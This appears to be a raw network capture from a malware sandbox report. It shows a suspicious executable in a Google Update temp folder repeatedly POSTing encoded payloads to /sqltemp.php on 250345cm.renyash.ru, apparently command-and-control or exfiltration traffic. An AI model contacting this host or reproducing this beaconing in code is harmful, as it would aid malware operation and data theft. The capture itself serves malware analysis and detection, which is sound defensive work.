Jan 1, 2025 16:03:53.610511065 CET | 1124 | OUT | Data Raw: 53 53 5f 52 51 5c 54 50 58 56 52 59 56 5b 59 54 5b 5e 54 5b 55 54 50 54 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SS_RQ\TPXVRYV[YT[^T[UTPTZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._05Y"/\%=8;7((#W= 2#("&Y?-:&Y.,Y-)
Jan 1, 2025 16:03:53.698395014 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:03:53.951035023 CET | 815 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:53 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0B4RcVRMraAi9gFJGbL1mNA%2BOpcScrw0fGHah7gHHj%2BEGL1Lr1B0ao7Tl9zPDN9z8cFSK1YKL0%2BvbKD72fqWKCVw2ehfneSzN3kgpPYeI%2BRG%2FQGSzGzj3%2FL%2BvQ3NRBJ821%2FKTSE8"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb366105f4c18c4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1508&rtt_var=1399&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=301528&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
140 | 192.168.2.6 | 62779 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:54.097178936 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
Jan 1, 2025 16:03:54.455806971 CET | 1124 | OUT | Data Raw: 53 52 5a 50 54 51 54 56 58 56 52 59 56 5d 59 51 5b 5e 54 5a 55 54 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SRZPTQTVXVRYV]YQ[^TZUTP_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y$9X7<1%=+B;9> [0+9$>+ (=C%8:&Y.,Y-1
Jan 1, 2025 16:03:54.550959110 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:03:54.720890999 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9sMiEjtdXerfJtfHI3V9plIEX6KsmNvMixphHazNcDhL2wPlCk2YVAuab%2F3m0GQb2RxhehLctKVEOqGn7BOGqUtvGjyatiAigP%2BZCWj82SAHglu7PTiDSTGLduYmMAeZMA7%2FnaAc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36615aa3243f2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4813&min_rtt=1825&rtt_var=6661&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=56740&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
141 | 192.168.2.6 | 62781 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:55.104376078 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:03:55.454268932 CET | 1124 | OUT | Data Raw: 53 50 5f 55 51 5b 54 5c 58 56 52 59 56 5c 59 51 5b 59 54 5d 55 5f 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_UQ[T\XVRYV\YQ[YT]U_P_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$%4='C8 0^?3>='#"#Z<8=B&#R::&Y.,Y-5
Jan 1, 2025 16:03:55.549325943 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:03:55.730376005 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:55 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hBPgGKBX30u5Dg8Ru5kidHrsq1mnE7RbL4dxbXLPurLGdSWlhdUIoQEGL5xDBjTCOdjm7IxPCpRyKBlj%2FteHU3ZNL1WwT7fL0wGmlB8uCopf27zpSFRJtxiOvXYZPhV7hCEfl7ZD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3661be88042be-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4861&min_rtt=1788&rtt_var=6816&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=55361&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
142 | 192.168.2.6 | 62782 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:55.871855021 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:03:56.220180035 CET | 1124 | OUT | Data Raw: 53 57 5f 50 51 58 54 50 58 56 52 59 56 5c 59 55 5b 53 54 50 55 5e 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_PQXTPXVRYV\YU[STPU^PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Z$X7/_3X7A8"4.$[*97)<Z T#\(5E1/S.&Y.,Y-5
Jan 1, 2025 16:03:56.336496115 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:03:56.513700008 CET | 816 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lP6oBaY3d%2FnzEWzQPsE3IRK6lIjxQTbvo%2FORB%2B4dO%2FFdzaGrznLWKHr9Dw4EX%2FvVyNmf6IAfL05i%2BnRKFBcvL3M4%2FtSmk%2B3ttT5O7dTEAd1T7GqI9IaoaKlb5Cky9f68VK%2BwklFa"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36620cb4543f4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4658&min_rtt=1901&rtt_var=6228&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=60929&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
143 | 192.168.2.6 | 62783 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:56.648524046 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:03:57.001368999 CET | 1124 | OUT | Data Raw: 53 55 5a 57 54 5b 51 51 58 56 52 59 56 5b 59 52 5b 5a 54 5a 55 58 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SUZWT[QQXVRYV[YR[ZTZUXP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y3=[7?Y%-</)-R4$Y+>=$#3X?!$/9*&Y.,Y-)
Jan 1, 2025 16:03:57.117804050 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:03:57.295105934 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e77y4xqgKK85UY6OMB7GJfFLCcyTgqZxi7Q1%2B9HgQ3ypiZt0CRJVccdh6xDiyjkevFoa7tj5oU9zR1LWLVqwz3jaewlso7qNUCdJiYlyUBnupFaMLzBpoagQCPRokcBZo5Qt7HWv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36625affb4277-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4663&min_rtt=1704&rtt_var=6557&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=57532&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
144 | 192.168.2.6 | 62784 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:57.617677927 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:03:57.969970942 CET | 1124 | OUT | Data Raw: 56 5f 5a 54 51 5b 51 50 58 56 52 59 56 51 59 54 5b 59 54 5b 55 55 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: V_ZTQ[QPXVRYVQYT[YT[UUP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$Z4!\3;;=R!-([(_7*(Z#?85C%;-:&Y.,Y-
Jan 1, 2025 16:03:58.078419924 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:03:58.349231958 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K79C2g9eqaJWXhnGNZTaTo35yIAMJTPAP1TS%2FoRUaR5Nqk6Iw4mcTcxue80j%2BFamutbSK1TkWw0gXHa7tY3cDAxX1nDwfBtlVgGIIDIiPFcRAFVZju71IDPQ%2FPR30ksMo7PYjfrc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3662bbf502369-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3514&min_rtt=1962&rtt_var=3841&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=101508&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
145 | 192.168.2.6 | 62785 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:58.474450111 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
146 | 192.168.2.6 | 62786 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:58.778578997 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:03:59.126214027 CET | 1964 | OUT | Data Raw: 56 56 5f 51 54 5f 51 50 58 56 52 59 56 5e 59 57 5b 5e 54 50 55 55 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VV_QT_QPXVRYV^YW[^TPUUPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3/.7/!\$-#,&7#<<)-$ ?Z?+:&//::&Y.,Y-
Jan 1, 2025 16:03:59.223149061 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:03:59.489717960 CET | 960 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1z3Mu8%2FdQPCyvwNhHQJk7NTUoh%2Bel3AOAnDOPlA%2Fne3eKSSa3iBXsRAY1hAFnJnEbc8rQjjRPKLo%2BKz%2FfSEPUxjPOcO0c%2F7k6TMEYbmUC5z5hZB0CpVgceSWpMdgmIJ2hRkVnKAO"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36632dcc57c9a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8699&min_rtt=2033&rtt_var=14096&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=26369&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 50 2a 2d 3e 1e 26 54 33 03 3f 3d 01 56 25 07 32 59 29 2b 29 01 30 58 23 58 2a 17 0d 10 36 02 26 01 26 38 2c 5a 23 03 09 5b 24 34 2b 59 05 1c 23 1d 36 01 20 12 2a 03 2c 05 32 06 21 59 24 3d 2b 05 28 3b 3c 11 20 28 2f 5e 33 3d 28 13 3e 39 2b 0e 27 2c 01 5e 3a 2c 22 0a 33 3a 2c 54 00 11 26 13 24 08 20 1b 20 37 0e 10 22 32 3d 13 25 1a 04 51 26 12 2f 19 37 39 2e 16 25 32 2b 5b 22 1d 2d 02 32 05 00 03 23 3d 24 0b 2a 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%P*->&T3?=V%2Y)+)0X#X*6&&8,Z#[$4+Y#6 *,2!Y$=+(;< (/^3=(>9+',^:,"3:,T&$ 7"2=%Q&/79.%2+["-2#=$*%S -H?WS0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
147 | 192.168.2.6 | 62787 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:58.899485111 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:03:59.251163006 CET | 1124 | OUT | Data Raw: 56 51 5f 5d 51 5c 54 55 58 56 52 59 56 58 59 54 5b 5a 54 5f 55 5f 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQ_]Q\TUXVRYVXYT[ZT_U_PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.',54?>3>;)%R#-_<7W)-8Z#!<(+51/7V:&Y.,Y-%
Jan 1, 2025 16:03:59.352057934 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:03:59.622087002 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xZVWnOKSLc6qRxKWsbWXNXHBk5HlSBG566ZKgeNaEClAbq2O9hwyY2GvZzVG3xv6IbVjKdRuj%2BUBjyevJjqx3rSEpq4jif%2Br0SSEhGhtDA40RdphxG%2B8xJTKwYokCSmr6HO2%2FmOm"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36633aeeb8ca8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8364&min_rtt=1979&rtt_var=13513&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=27514&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
148 | 192.168.2.6 | 62788 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:59.771250010 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
Jan 1, 2025 16:04:00.126471996 CET | 1124 | OUT | Data Raw: 56 51 5f 51 54 5e 51 52 58 56 52 59 56 5d 59 55 5b 58 54 50 55 5b 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQ_QT^QRXVRYV]YU[XTPU[P[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^$/X7&38:=S!=?*9+)]7/]+;%1$-*&Y.,Y-1
Jan 1, 2025 16:04:00.229738951 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:04:00.412200928 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:04:00 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VZjHqK5b96V%2FPipFehaf5xIk31y7VwCxcd1DuRPceFLOA0D6q4JlzRBAjHuN5nML%2B%2BS4dvNrvhYFLj84vYrNkPxcaxXnjYWSE5Q0B3w%2BCGXM5Fq1k6iy8E06pVGZ3B%2Fsq2VTcOHD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb366392c1842f4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
